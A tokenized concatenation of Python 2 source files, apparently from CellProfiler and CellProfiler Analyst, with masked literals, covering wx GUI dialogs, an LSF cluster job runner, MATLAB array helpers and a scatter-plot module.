<NUM_LIT:1> , wx . EXPAND ) <EOL> self . Sizer . Add ( sz , <NUM_LIT:0> , wx . EXPAND | wx . ALL , <NUM_LIT:5> ) <EOL> self . Sizer . AddSpacer ( ( - <NUM_LIT:1> , <NUM_LIT:5> ) ) <EOL> self . Sizer . Add ( wx . StaticText ( self , - <NUM_LIT:1> , '<STR_LIT>' ) , <NUM_LIT:0> , wx . BOTTOM | wx . LEFT | wx . RIGHT , <NUM_LIT:5> ) <EOL> self . Sizer . AddSpacer ( ( - <NUM_LIT:1> , <NUM_LIT:10> ) ) <EOL> self . sw = wx . ScrolledWindow ( self ) <EOL> self . panels = [ ColumnFilterPanel ( self . sw , tables , False ) ] <EOL> self . sw . Sizer = wx . BoxSizer ( wx . VERTICAL ) <EOL> ( w , h ) = self . sw . Sizer . GetSize ( ) <EOL> self . sw . SetScrollbars ( <NUM_LIT:20> , <NUM_LIT:20> , w / <NUM_LIT:20> , h / <NUM_LIT:20> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . sw . Sizer . Add ( self . panels [ <NUM_LIT:0> ] , <NUM_LIT:0> , wx . EXPAND | wx . BOTTOM | wx . LEFT | wx . RIGHT , <NUM_LIT:5> ) <EOL> self . Sizer . Add ( self . sw , <NUM_LIT:1> , wx . EXPAND ) <EOL> sz = wx . BoxSizer ( wx . HORIZONTAL ) <EOL> sz . AddSpacer ( ( <NUM_LIT:10> , - <NUM_LIT:1> ) ) <EOL> sz . Add ( self . addbtn , <NUM_LIT:0> ) <EOL> sz . AddStretchSpacer ( ) <EOL> sz . Add ( self . ok , <NUM_LIT:0> ) <EOL> sz . AddSpacer ( ( <NUM_LIT:10> , - <NUM_LIT:1> ) ) <EOL> sz . Add ( self . cancel , <NUM_LIT:0> ) <EOL> sz . AddSpacer ( ( <NUM_LIT:10> , - <NUM_LIT:1> ) ) <EOL> self . Sizer . AddSpacer ( ( - <NUM_LIT:1> , <NUM_LIT:10> ) ) <EOL> self . Sizer . Add ( sz , <NUM_LIT:0> , wx . EXPAND ) <EOL> self . Sizer . AddSpacer ( ( - <NUM_LIT:1> , <NUM_LIT:10> ) ) <EOL> self . validate_filter_name ( ) <EOL> self . addbtn . Bind ( wx . EVT_BUTTON , self . on_add_column ) <EOL> self . ok . Bind ( wx . EVT_BUTTON , self . on_ok ) <EOL> self . cancel . Bind ( wx . EVT_BUTTON , self . on_cancel ) <EOL> self . filter_name . Bind ( wx . EVT_TEXT , self . validate_filter_name ) <EOL> self . resize_to_fit ( ) <EOL> def reset ( self ) : <EOL> for panel in self . panels [ <NUM_LIT:1> : ] : <EOL> self . remove ( panel ) <EOL> self . Refresh ( ) <EOL> def on_ok ( self , evt ) : <EOL> self . EndModal ( wx . OK ) <EOL> def on_cancel ( self , evt ) : <EOL> self . EndModal ( wx . CANCEL ) <EOL> def validate_filter_name ( self , evt = None ) : <EOL> name = self . get_filter_name ( ) <EOL> self . ok . Enable ( ) <EOL> self . filter_name . SetForegroundColour ( '<STR_LIT>' ) <EOL> if ( name in p . _filters <EOL> or name in p . gates <EOL> or not re . match ( '<STR_LIT>' , name ) ) : <EOL> self . ok . Disable ( ) <EOL> self . filter_name . SetForegroundColour ( '<STR_LIT>' ) <EOL> def get_filter ( self ) : <EOL> fltr = self . panels [ <NUM_LIT:0> ] . get_filter ( ) <EOL> for i , conj in enumerate ( self . conjunctions ) : <EOL> fltr . append_expression ( conj . GetStringSelection ( ) , <EOL> * self . panels [ i + <NUM_LIT:1> ] . get_filter ( ) . get_token_list ( ) ) <EOL> return fltr <EOL> def get_filter_name ( self ) : <EOL> return str ( self . filter_name . Value ) <EOL> def remove ( self , panel ) : <EOL> i = self . panels . index ( panel ) <EOL> if <NUM_LIT:0> < i <= len ( self . conjunctions ) : <EOL> self . sw . Sizer . Remove ( self . conjunctions [ i - <NUM_LIT:1> ] ) <EOL> self . conjunctions . pop ( i - <NUM_LIT:1> ) . Destroy ( ) <EOL> self . Sizer . Remove ( panel ) <EOL> self . panels . remove ( panel ) <EOL> panel . Destroy ( ) <EOL> self . sw . FitInside ( ) <EOL> self . resize_to_fit ( ) <EOL> def on_add_column ( self , evt ) : <EOL> self . add_column ( ) <EOL> def add_column ( self , conjunction = '<STR_LIT>' , expression = None ) : <EOL> '''<STR_LIT>''' <EOL> self . panels += [ ColumnFilterPanel ( self . sw , self . tables , expression = expression ) ] <EOL> self . conjunctions += [ wx . Choice ( self . sw , - <NUM_LIT:1> , choices = [ '<STR_LIT>' , '<STR_LIT>' ] ) ] <EOL> self . conjunctions [ - <NUM_LIT:1> ] . SetStringSelection ( conjunction ) <EOL> self . sw . Sizer . Add ( self . conjunctions [ - <NUM_LIT:1> ] , <NUM_LIT:0> , wx . CENTER | wx . BOTTOM | wx . LEFT | wx . RIGHT , <NUM_LIT:5> ) <EOL> self . sw . Sizer . Add ( self . panels [ - <NUM_LIT:1> ] , <NUM_LIT:0> , wx . EXPAND | wx . BOTTOM | wx . LEFT | wx . RIGHT , <NUM_LIT:5> ) <EOL> self . sw . FitInside ( ) <EOL> self . resize_to_fit ( ) <EOL> def resize_to_fit ( self ) : <EOL> w = min ( self . sw . Sizer . MinSize [ <NUM_LIT:0> ] + self . Sizer . MinSize [ <NUM_LIT:0> ] , <EOL> wx . GetDisplaySize ( ) [ <NUM_LIT:0> ] - self . Position [ <NUM_LIT:0> ] ) <EOL> h = min ( self . sw . Sizer . MinSize [ <NUM_LIT:1> ] + self . Sizer . MinSize [ <NUM_LIT:1> ] , <EOL> wx . GetDisplaySize ( ) [ <NUM_LIT:1> ] - self . Position [ <NUM_LIT:1> ] ) <EOL> self . SetSize ( ( w , h + <NUM_LIT:7> ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import sys <EOL> import logging <EOL> logging . basicConfig ( level = logging . DEBUG ) <EOL> app = wx . PySimpleApp ( ) <EOL> if len ( sys . argv ) > <NUM_LIT:1> : <EOL> propsFile = sys . argv [ <NUM_LIT:1> ] <EOL> p . LoadFile ( propsFile ) <EOL> else : <EOL> p . LoadFile ( '<STR_LIT>' ) <EOL> p . _filters [ '<STR_LIT:test>' ] = sql . Filter ( ( '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , sql . Column ( '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' , '<STR_LIT>' ) <EOL> p . _filters_ordered += [ '<STR_LIT:test>' ] <EOL> p . _filters [ '<STR_LIT>' ] = sql . Filter ( ( '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' , '<STR_LIT>' ) <EOL> p . _filters_ordered += [ '<STR_LIT>' ] <EOL> cff = ColumnFilterDialog ( None , tables = [ p . image_table ] ) <EOL> if cff . ShowModal ( ) == wx . OK : <EOL> print cff . get_filter ( ) <EOL> cff . Destroy ( ) <EOL> app . MainLoop ( ) </s>
<s> '''<STR_LIT>''' <EOL> import wx <EOL> import math <EOL> class ImageTileSizer ( wx . PySizer ) : <EOL> def __init__ ( self ) : <EOL> wx . PySizer . __init__ ( self ) <EOL> def pitch ( self ) : <EOL> sizes = [ c . GetSize ( ) + wx . Size ( <NUM_LIT:2> * c . GetBorder ( ) , <NUM_LIT:2> * c . GetBorder ( ) ) <EOL> for c in self . GetChildren ( ) ] <EOL> if sizes == [ ] : <EOL> return None <EOL> else : <EOL> return max ( sizes ) <EOL> def CalcMin ( self ) : <EOL> n = len ( self . GetChildren ( ) ) <EOL> if n > <NUM_LIT:0> : <EOL> width = self . GetContainingWindow ( ) . GetClientSize ( ) . GetWidth ( ) <EOL> self . columns = max ( <NUM_LIT:1> , width / self . pitch ( ) . x ) <EOL> self . rows = math . ceil ( <NUM_LIT:1.0> * n / self . columns ) <EOL> pitch = self . pitch ( ) <EOL> return wx . Size ( self . columns * pitch . x , self . rows * pitch . y ) <EOL> else : <EOL> return wx . Size ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> def RecalcSizes ( self ) : <EOL> self . CalcMin ( ) <EOL> origin = self . GetPosition ( ) <EOL> pitch = self . pitch ( ) <EOL> for k , item in enumerate ( self . GetChildren ( ) ) : <EOL> i = k / self . columns <EOL> j = k % self . columns <EOL> pos = origin + wx . Point ( j * pitch . x , i * pitch . y ) <EOL> item = self . GetChildren ( ) [ i * self . columns + j ] <EOL> border = item . GetBorder ( ) <EOL> item . SetDimension ( pos + wx . Point ( border , border ) , item . GetSize ( ) ) </s>
<s> import types <EOL> import errno <EOL> import re <EOL> import random <EOL> import sys <EOL> import time <EOL> import pickle <EOL> import marshal <EOL> import os <EOL> import tempfile <EOL> import progressbar <EOL> import traceback <EOL> class LSF ( object ) : <EOL> def __init__ ( self , njobs , directory = None , memory = None , job_array_name = '<STR_LIT>' ) : <EOL> self . njobs = njobs <EOL> self . memory = memory <EOL> self . job_array_name = job_array_name <EOL> if directory is None : <EOL> self . directory = tempfile . mkdtemp ( dir = '<STR_LIT:.>' ) <EOL> else : <EOL> self . directory = directory <EOL> if not os . path . exists ( self . directory ) : <EOL> os . mkdir ( self . directory ) <EOL> def view ( self , name ) : <EOL> return LSFView ( self . njobs , os . path . join ( self . directory , name ) , self . memory , self . job_array_name ) <EOL> class LSFView ( object ) : <EOL> def __init__ ( self , njobs , directory = None , memory = None , job_array_name = '<STR_LIT>' ) : <EOL> self . njobs = njobs <EOL> self . memory = memory <EOL> self . job_array_name = job_array_name <EOL> if directory is None : <EOL> self . directory = tempfile . mkdtemp ( dir = '<STR_LIT:.>' ) <EOL> self . resuming = False <EOL> else : <EOL> self . directory = directory <EOL> self . resuming = os . path . exists ( self . directory ) <EOL> if not self . resuming : <EOL> os . mkdir ( self . directory ) <EOL> def create_subdirectories ( self ) : <EOL> for subdir in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> path = os . path . join ( self . directory , subdir ) <EOL> os . mkdir ( path ) <EOL> def start_workers ( self ) : <EOL> args = [ '<STR_LIT>' ] <EOL> if self . memory : <EOL> args . extend ( [ '<STR_LIT>' , '<STR_LIT>' % int ( self . memory ) ] ) <EOL> args . extend ( [ '<STR_LIT>' , '<STR_LIT>' % ( self . job_array_name , self . njobs ) , '<STR_LIT>' , <EOL> '<STR_LIT>' % self . directory , sys . executable , <EOL> '<STR_LIT>' , '<STR_LIT>' , self . directory ] ) <EOL> cmd = '<STR_LIT:U+0020>' . join ( args ) <EOL> print cmd <EOL> os . system ( cmd ) <EOL> def list_precomputed_results ( self ) : <EOL> return set ( int ( re . match ( '<STR_LIT>' , fn ) . group ( <NUM_LIT:1> ) ) <EOL> for fn in os . listdir ( os . path . join ( self . directory , '<STR_LIT>' ) ) ) <EOL> def submit_task ( self , task_id , task_dict ) : <EOL> basename = '<STR_LIT>' % task_id <EOL> tmp_filename = os . path . join ( self . directory , '<STR_LIT>' , basename ) <EOL> with open ( tmp_filename , '<STR_LIT:w>' ) as f : <EOL> pickle . dump ( task_dict , f ) <EOL> os . rename ( tmp_filename , os . path . join ( self . directory , '<STR_LIT>' , basename ) ) <EOL> def signal_done_submitting ( self ) : <EOL> open ( os . path . join ( self . directory , '<STR_LIT>' ) , '<STR_LIT:w>' ) . close ( ) <EOL> def progress ( self , s , n ) : <EOL> return progressbar . ProgressBar ( widgets = [ s , progressbar . Percentage ( ) , <EOL> '<STR_LIT:U+0020>' , progressbar . Bar ( ) , '<STR_LIT:U+0020>' , <EOL> progressbar . Counter ( ) , '<STR_LIT:/>' , <EOL> str ( n ) , '<STR_LIT:U+0020>' , progressbar . ETA ( ) ] , <EOL> maxval = n ) <EOL> def read_results ( self , task_id ) : <EOL> with open ( os . path . join ( self . directory , '<STR_LIT>' , '<STR_LIT>' % task_id ) ) as f : <EOL> results = pickle . load ( f ) [ '<STR_LIT:result>' ] <EOL> for r in results : <EOL> yield r <EOL> def imap ( self , function , parameters ) : <EOL> if not self . resuming : <EOL> self . create_subdirectories ( ) <EOL> self . start_workers ( ) <EOL> done_tasks = self . list_precomputed_results ( ) <EOL> batch_size = <NUM_LIT:1> + len ( parameters ) // <NUM_LIT> <EOL> print '<STR_LIT>' , batch_size <EOL> all_batches = [ ] <EOL> while parameters : <EOL> all_batches . append ( parameters [ : batch_size ] ) <EOL> parameters = parameters [ batch_size : ] <EOL> batches = [ ( task_id , batch ) <EOL> for task_id , batch in enumerate ( all_batches ) <EOL> if task_id not in done_tasks ] <EOL> if len ( batches ) > <NUM_LIT:0> : <EOL> progress = self . progress ( '<STR_LIT>' , len ( batches ) ) <EOL> for task_id , batch in progress ( batches ) : <EOL> self . submit_task ( task_id , dict ( function = marshal . dumps ( function . func_code ) , <EOL> batch = batch , <EOL> task_id = task_id , attempts = <NUM_LIT:3> ) ) <EOL> self . signal_done_submitting ( ) <EOL> next = <NUM_LIT:0> <EOL> while True : <EOL> try : <EOL> npending = len ( os . listdir ( os . path . join ( self . directory , '<STR_LIT>' ) ) ) <EOL> nrunning = len ( os . listdir ( os . path . join ( self . directory , '<STR_LIT>' ) ) ) <EOL> except OSError , e : <EOL> if e . errno == errno . EIO : <EOL> continue <EOL> else : <EOL> raise <EOL> for fn in os . listdir ( os . path . join ( self . directory , '<STR_LIT>' ) ) : <EOL> task_id = int ( re . match ( '<STR_LIT>' , fn ) . group ( <NUM_LIT:1> ) ) <EOL> if task_id not in done_tasks : <EOL> done_tasks . add ( task_id ) <EOL> while next in done_tasks : <EOL> for r in self . read_results ( next ) : <EOL> yield r <EOL> next += <NUM_LIT:1> <EOL> if next == len ( all_batches ) : <EOL> return <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> def test_function ( ( seconds ) ) : <EOL> import time <EOL> time . sleep ( seconds ) <EOL> return seconds <EOL> def test ( ) : <EOL> view = LSFView ( <NUM_LIT:3> , '<STR_LIT>' ) <EOL> print view . directory <EOL> for result in view . imap ( test_function , [ random . randint ( <NUM_LIT:1> , <NUM_LIT:10> ) <EOL> for task in range ( <NUM_LIT:10> ) ] ) : <EOL> print '<STR_LIT>' , result <EOL> class Worker ( object ) : <EOL> def __init__ ( self , directory , job_id , array_index ) : <EOL> self . directory = directory <EOL> self . job_id = job_id <EOL> self . array_index = array_index <EOL> self . start_time = time . time ( ) <EOL> def run ( self ) : <EOL> while True : <EOL> task = self . get_task ( ) <EOL> if task is None : <EOL> print '<STR_LIT>' <EOL> break <EOL> task_id = task [ '<STR_LIT>' ] <EOL> print '<STR_LIT>' , task_id <EOL> start_time = time . time ( ) <EOL> try : <EOL> code = marshal . loads ( task [ '<STR_LIT>' ] ) <EOL> function = types . FunctionType ( code , globals ( ) , "<STR_LIT>" ) <EOL> result = map ( function , task [ '<STR_LIT>' ] ) <EOL> except : <EOL> traceback . print_exc ( None , sys . stderr ) <EOL> if task [ '<STR_LIT>' ] > <NUM_LIT:0> : <EOL> task [ '<STR_LIT>' ] -= <NUM_LIT:1> <EOL> with open ( self . filename ( '<STR_LIT>' , task_id ) , '<STR_LIT:w>' ) as f : <EOL> pickle . dump ( task , f ) <EOL> os . rename ( self . filename ( '<STR_LIT>' , task_id ) , <EOL> self . filename ( '<STR_LIT>' , task_id ) ) <EOL> else : <EOL> os . rename ( self . filename ( '<STR_LIT>' , task_id ) , <EOL> self . filename ( '<STR_LIT>' , task_id ) ) <EOL> continue <EOL> end_time = time . time ( ) <EOL> done = dict ( start_time = start_time , end_time = end_time , <EOL> elapsed = end_time - start_time , task_id = task_id , <EOL> job_id = self . job_id , array_index = self . array_index , <EOL> uname = os . uname ( ) , result = result ) <EOL> with open ( self . filename ( '<STR_LIT>' , task_id ) , '<STR_LIT:w>' ) as f : <EOL> pickle . dump ( done , f ) <EOL> os . rename ( self . filename ( '<STR_LIT>' , task_id ) , self . filename ( '<STR_LIT>' , task_id ) ) <EOL> os . unlink ( self . filename ( '<STR_LIT>' , task_id ) ) <EOL> if self . is_too_old ( ) : <EOL> print "<STR_LIT>" <EOL> break <EOL> def filename ( self , subdir , task_id ) : <EOL> if subdir == '<STR_LIT>' : <EOL> basename = '<STR_LIT>' % ( self . job_id , self . array_index , task_id ) <EOL> else : <EOL> basename = '<STR_LIT>' % task_id <EOL> return os . path . join ( self . directory , subdir , basename ) <EOL> def get_task ( self ) : <EOL> while True : <EOL> tasks = os . listdir ( os . path . join ( self . directory , '<STR_LIT>' ) ) <EOL> if len ( tasks ) == <NUM_LIT:0> : <EOL> if os . path . exists ( os . path . join ( self . directory , '<STR_LIT>' ) ) : <EOL> return None <EOL> else : <EOL> print '<STR_LIT>' <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> continue <EOL> task_basename = tasks [ random . randint ( <NUM_LIT:0> , len ( tasks ) - <NUM_LIT:1> ) ] <EOL> new_filename = os . path . join ( self . directory , '<STR_LIT>' , task_basename ) <EOL> try : <EOL> with open ( new_filename ) as f : <EOL> task = pickle . load ( f ) <EOL> task_id = task [ '<STR_LIT>' ] <EOL> cur_filename = self . filename ( '<STR_LIT>' , task_id ) <EOL> os . rename ( new_filename , cur_filename ) <EOL> return task <EOL> except IOError , e : <EOL> if e . errno != errno . ENOENT : <EOL> raise <EOL> except OSError , e : <EOL> if e . errno != errno . ENOENT : <EOL> raise <EOL> def is_too_old ( self ) : <EOL> elapsed = time . time ( ) - self . start_time <EOL> return elapsed >= <NUM_LIT> <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> if len ( sys . argv ) == <NUM_LIT:2> : <EOL> directory = sys . argv [ <NUM_LIT:1> ] <EOL> job_id = int ( os . environ [ '<STR_LIT>' ] ) <EOL> array_index = int ( os . environ [ '<STR_LIT>' ] ) <EOL> worker = Worker ( directory , job_id , array_index ) <EOL> worker . run ( ) <EOL> elif len ( sys . argv ) == <NUM_LIT:1> : <EOL> test ( ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import code <EOL> import sys <EOL> from optparse import OptionParser <EOL> import cpa <EOL> import cpa . properties <EOL> import cpa . dbconnect <EOL> parser = OptionParser ( "<STR_LIT>" ) <EOL> options , args = parser . parse_args ( ) <EOL> if len ( args ) > <NUM_LIT:0> : <EOL> cpa . properties . LoadFile ( sys . argv [ <NUM_LIT:1> ] ) <EOL> variables = { '<STR_LIT>' : cpa } <EOL> if len ( args ) == <NUM_LIT:2> : <EOL> interpreter = code . InteractiveInterpreter ( locals = variables ) <EOL> interpreter . runsource ( sys . argv [ <NUM_LIT:2> ] ) <EOL> else : <EOL> code . interact ( local = variables ) </s>
<s> class Observable : <EOL> '''<STR_LIT>''' <EOL> _observers = None <EOL> def addobserver ( self , observer ) : <EOL> if not self . _observers : <EOL> self . _observers = [ ] <EOL> self . _observers . append ( observer ) <EOL> def removeobserver ( self , observer ) : <EOL> if observer in self . _observers : <EOL> self . _observers . remove ( observer ) <EOL> def notify ( self , event ) : <EOL> for o in self . _observers or ( ) : <EOL> o ( event ) <EOL> class ObservableDict ( dict , Observable ) : <EOL> def __setitem__ ( self , key , value ) : <EOL> dict . __setitem__ ( self , key , value ) <EOL> self . notify ( ( key , value ) ) <EOL> def __delitem__ ( self , key ) : <EOL> dict . __delitem__ ( self , key ) <EOL> self . notify ( ( key , None ) ) <EOL> def pop ( self , key ) : <EOL> v = dict . pop ( self , key ) <EOL> self . notify ( ( key , None ) ) <EOL> return v <EOL> def clear ( self ) : <EOL> dict . clear ( self ) <EOL> self . notify ( None ) <EOL> import threading <EOL> from functools import wraps <EOL> def delay ( delay = <NUM_LIT:0.> ) : <EOL> """<STR_LIT>""" <EOL> def wrap ( f ) : <EOL> @ wraps ( f ) <EOL> def delayed ( * args , ** kwargs ) : <EOL> timer = threading . Timer ( delay , f , args = args , kwargs = kwargs ) <EOL> timer . start ( ) <EOL> return delayed <EOL> return wrap </s>
<s> from cellprofiler . preferences import get_background_color , set_startup_blurb <EOL> import cellprofiler . gui . html . content <EOL> import cellprofiler . icons <EOL> import content <EOL> import os <EOL> import sys <EOL> import urllib <EOL> import urllib2 <EOL> import webbrowser <EOL> import wx <EOL> import wx . html <EOL> MEMORY_SCHEME = "<STR_LIT>" <EOL> WELCOME_SCREEN_FRAME = "<STR_LIT>" <EOL> class HtmlClickableWindow ( wx . html . HtmlWindow ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> wx . html . HtmlWindow . __init__ ( self , * args , ** kwargs ) <EOL> def load_startup_blurb ( self ) : <EOL> self . OnLinkClicked ( wx . html . HtmlLinkInfo ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def OnLinkClicked ( self , linkinfo ) : <EOL> href = linkinfo . Href <EOL> if href . startswith ( "<STR_LIT:#>" ) : <EOL> super ( HtmlClickableWindow , self ) . OnLinkClicked ( linkinfo ) <EOL> elif href . startswith ( '<STR_LIT>' ) : <EOL> webbrowser . open ( href ) <EOL> elif href . startswith ( '<STR_LIT>' ) : <EOL> if '<STR_LIT>' in href : <EOL> set_startup_blurb ( False ) <EOL> parent = self . Parent <EOL> while parent is not None : <EOL> if parent . Name == WELCOME_SCREEN_FRAME : <EOL> parent . Close ( ) <EOL> break <EOL> parent = parent . Parent <EOL> elif href . startswith ( '<STR_LIT>' ) : <EOL> href = linkinfo . Href [ <NUM_LIT:7> : ] <EOL> html_str = cellprofiler . gui . html . content . WELCOME_HELP [ href ] <EOL> html_str += '<STR_LIT>' <EOL> self . SetPage ( html_str ) <EOL> elif href . startswith ( '<STR_LIT>' ) : <EOL> pipeline_filename = href [ <NUM_LIT:5> : ] <EOL> try : <EOL> fd = urllib2 . urlopen ( pipeline_filename ) <EOL> if fd . code < <NUM_LIT:200> or fd . code > <NUM_LIT> : <EOL> wx . MessageBox ( <EOL> "<STR_LIT>" % <EOL> pipeline_filename , <EOL> caption = "<STR_LIT>" , <EOL> style = wx . OK | wx . ICON_INFORMATION ) <EOL> return <EOL> wx . CallAfter ( wx . GetApp ( ) . frame . pipeline . load , fd ) <EOL> except : <EOL> wx . MessageBox ( <EOL> '<STR_LIT>' % <EOL> pipeline_filename , "<STR_LIT>" , <EOL> style = wx . OK | wx . ICON_ERROR ) <EOL> elif href . startswith ( '<STR_LIT>' ) : <EOL> pipeline_filename = href [ <NUM_LIT:12> : ] <EOL> try : <EOL> import cellprofiler . modules . loaddata <EOL> fd = urllib . urlopen ( pipeline_filename ) <EOL> if fd . code < <NUM_LIT:200> or fd . code > <NUM_LIT> : <EOL> wx . MessageBox ( <EOL> "<STR_LIT>" % <EOL> pipeline_filename , <EOL> caption = "<STR_LIT>" , <EOL> style = wx . OK | wx . ICON_INFORMATION ) <EOL> return <EOL> def fn ( fd = fd ) : <EOL> pipeline = wx . GetApp ( ) . frame . pipeline <EOL> pipeline . load ( fd ) <EOL> for module in pipeline . modules ( ) : <EOL> if isinstance ( module , cellprofiler . modules . loaddata . LoadData ) : <EOL> global header_cache <EOL> header_cache = { } <EOL> try : <EOL> module . open_csv ( ) <EOL> except : <EOL> pass <EOL> wx . MessageBox ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , wx . ICON_INFORMATION ) <EOL> wx . CallAfter ( fn ) <EOL> except : <EOL> wx . MessageBox ( <EOL> '<STR_LIT>' % <EOL> pipeline_filename , "<STR_LIT>" , <EOL> style = wx . OK | wx . ICON_ERROR ) <EOL> else : <EOL> newpage = content . find_link ( href ) <EOL> if newpage is not None : <EOL> self . SetPage ( newpage ) <EOL> else : <EOL> super ( HtmlClickableWindow , self ) . OnLinkClicked ( linkinfo ) <EOL> def OnOpeningURL ( self , file_format , url ) : <EOL> if file_format == wx . html . HTML_URL_IMAGE : <EOL> if url . startswith ( MEMORY_SCHEME ) : <EOL> path = cellprofiler . icons . get_builtin_images_path ( ) <EOL> full_path = os . path . join ( path , url [ len ( MEMORY_SCHEME ) : ] ) <EOL> if sys . platform . startswith ( "<STR_LIT>" ) : <EOL> my_url = full_path <EOL> else : <EOL> my_url = "<STR_LIT>" + urllib . pathname2url ( full_path ) <EOL> return my_url <EOL> return wx . html . HTML_OPEN </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import tempfile <EOL> import numpy <EOL> import scipy . io . matlab . mio <EOL> def new_string_cell_array ( shape ) : <EOL> """<STR_LIT>""" <EOL> result = numpy . ndarray ( shape , dtype = numpy . dtype ( '<STR_LIT:object>' ) ) <EOL> for i in range ( <NUM_LIT:0> , shape [ <NUM_LIT:0> ] ) : <EOL> for j in range ( <NUM_LIT:0> , shape [ <NUM_LIT:1> ] ) : <EOL> result [ i , j ] = numpy . empty ( ( <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> return result <EOL> def make_cell_struct_dtype ( fields ) : <EOL> """<STR_LIT>""" <EOL> return numpy . dtype ( [ ( str ( x ) , '<STR_LIT>' ) for x in fields ] ) <EOL> def encapsulate_strings_in_arrays ( handles ) : <EOL> """<STR_LIT>""" <EOL> if handles . dtype . kind == '<STR_LIT:O>' : <EOL> flat = handles . flat <EOL> for i in range ( <NUM_LIT:0> , len ( flat ) ) : <EOL> if isinstance ( flat [ i ] , str ) or isinstance ( flat [ i ] , unicode ) : <EOL> flat [ i ] = encapsulate_string ( flat [ i ] ) <EOL> elif isinstance ( flat [ i ] , numpy . ndarray ) : <EOL> encapsulate_strings_in_arrays ( flat [ i ] ) <EOL> elif handles . dtype . fields : <EOL> for field in handles . dtype . fields . keys ( ) : <EOL> if isinstance ( handles [ field ] , str ) or isinstance ( handles [ field ] , unicode ) : <EOL> handles [ field ] = encapsulate_string ( handles [ field ] ) <EOL> elif isinstance ( handles [ field ] , numpy . ndarray ) : <EOL> encapsulate_strings_in_arrays ( handles [ field ] ) <EOL> def encapsulate_string ( s ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( s , str ) : <EOL> result = numpy . ndarray ( ( <NUM_LIT:1> , ) , '<STR_LIT>' % ( len ( s ) ) ) <EOL> else : <EOL> result = numpy . ndarray ( ( <NUM_LIT:1> , ) , '<STR_LIT>' % ( len ( s ) ) ) <EOL> result [ <NUM_LIT:0> ] = s <EOL> return result </s>
<s> '''<STR_LIT>''' <EOL> import numpy as np <EOL> import cellprofiler . cpimage as cpi <EOL> import cellprofiler . cpmodule as cpm <EOL> import cellprofiler . measurements as cpmeas <EOL> import cellprofiler . settings as cps <EOL> SOURCE_IM = cpmeas . IMAGE <EOL> SOURCE_OBJ = "<STR_LIT>" <EOL> SOURCE_CHOICE = [ SOURCE_IM , SOURCE_OBJ ] <EOL> SCALE_CHOICE = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class DisplayScatterPlot ( cpm . CPModule ) : <EOL> module_name = "<STR_LIT>" <EOL> category = "<STR_LIT>" <EOL> variable_revision_number = <NUM_LIT:2> <EOL> def create_settings ( self ) : <EOL> self . x_source = cps . Choice ( <EOL> "<STR_LIT>" , SOURCE_CHOICE , doc = '''<STR_LIT>''' % globals ( ) ) <EOL> self . x_object = cps . ObjectNameSubscriber ( <EOL> '<STR_LIT>' , <EOL> cps . NONE , doc = '''<STR_LIT>''' ) <EOL> self . x_axis = cps . Measurement ( <EOL> '<STR_LIT>' , <EOL> self . get_x_object , cps . NONE , doc = '''<STR_LIT>''' ) <EOL> self . y_source = cps . Choice ( "<STR_LIT>" , SOURCE_CHOICE , doc = '''<STR_LIT>''' % globals ( ) ) <EOL> self . y_object = cps . ObjectNameSubscriber ( <EOL> '<STR_LIT>' , <EOL> cps . NONE , doc = '''<STR_LIT>''' ) <EOL> self . y_axis = cps . Measurement ( <EOL> '<STR_LIT>' , <EOL> self . get_y_object , cps . NONE , doc = '''<STR_LIT>''' ) <EOL> self . xscale = cps . Choice ( <EOL> '<STR_LIT>' , SCALE_CHOICE , None , doc = '''<STR_LIT>''' ) <EOL> self . yscale = cps . Choice ( <EOL> '<STR_LIT>' , SCALE_CHOICE , None , doc = '''<STR_LIT>''' ) <EOL> self . title = cps . Text ( <EOL> '<STR_LIT>' , '<STR_LIT>' , doc = '''<STR_LIT>''' ) <EOL> def get_x_object ( self ) : <EOL> if self . x_source . value == cpmeas . IMAGE : <EOL> return cpmeas . IMAGE <EOL> return self . x_object . value <EOL> def get_y_object ( self ) : <EOL> if self . y_source . value == cpmeas . IMAGE : <EOL> return cpmeas . IMAGE <EOL> return self . x_object . value <EOL> def settings ( self ) : <EOL> result = [ self . x_source , self . x_object , self . x_axis ] <EOL> result += [ self . y_source , self . y_object , self . y_axis ] <EOL> result += [ self . xscale , self . yscale , self . title ] <EOL> return result <EOL> def visible_settings ( self ) : <EOL> result = [ self . x_source ] <EOL> if self . x_source . value != cpmeas . IMAGE : <EOL> result += [ self . x_object , self . x_axis ] <EOL> else : <EOL> result += [ self . x_axis ] <EOL> result += [ self . y_source ] <EOL> if self . y_source . value != cpmeas . IMAGE : <EOL> result += [ self . y_object , self . y_axis ] <EOL> else : <EOL> result += [ self . y_axis ] <EOL> result += [ self . xscale , self . yscale , self . title ] <EOL> return result <EOL> def run ( self , workspace ) : <EOL> m = workspace . get_measurements ( ) <EOL> if self . x_source . value == self . y_source . value : <EOL> if self . x_source . value == cpmeas . IMAGE : <EOL> xvals = m . get_all_measurements ( cpmeas . IMAGE , self . x_axis . value ) <EOL> yvals = m . get_all_measurements ( cpmeas . IMAGE , self . y_axis . value ) <EOL> xvals , yvals = np . array ( [ <EOL> ( x if np . isscalar ( x ) else x [ <NUM_LIT:0> ] , y if np . isscalar ( y ) else y [ <NUM_LIT:0> ] ) <EOL> for x , y in zip ( xvals , yvals ) <EOL> if ( x is not None ) and ( y is not None ) ] ) . transpose ( ) <EOL> title = '<STR_LIT:%s>' % self . title . value <EOL> else : <EOL> xvals = m . get_current_measurement ( self . get_x_object ( ) , self . x_axis . value ) <EOL> yvals = m . get_current_measurement ( self . get_y_object ( ) , self . y_axis . value ) 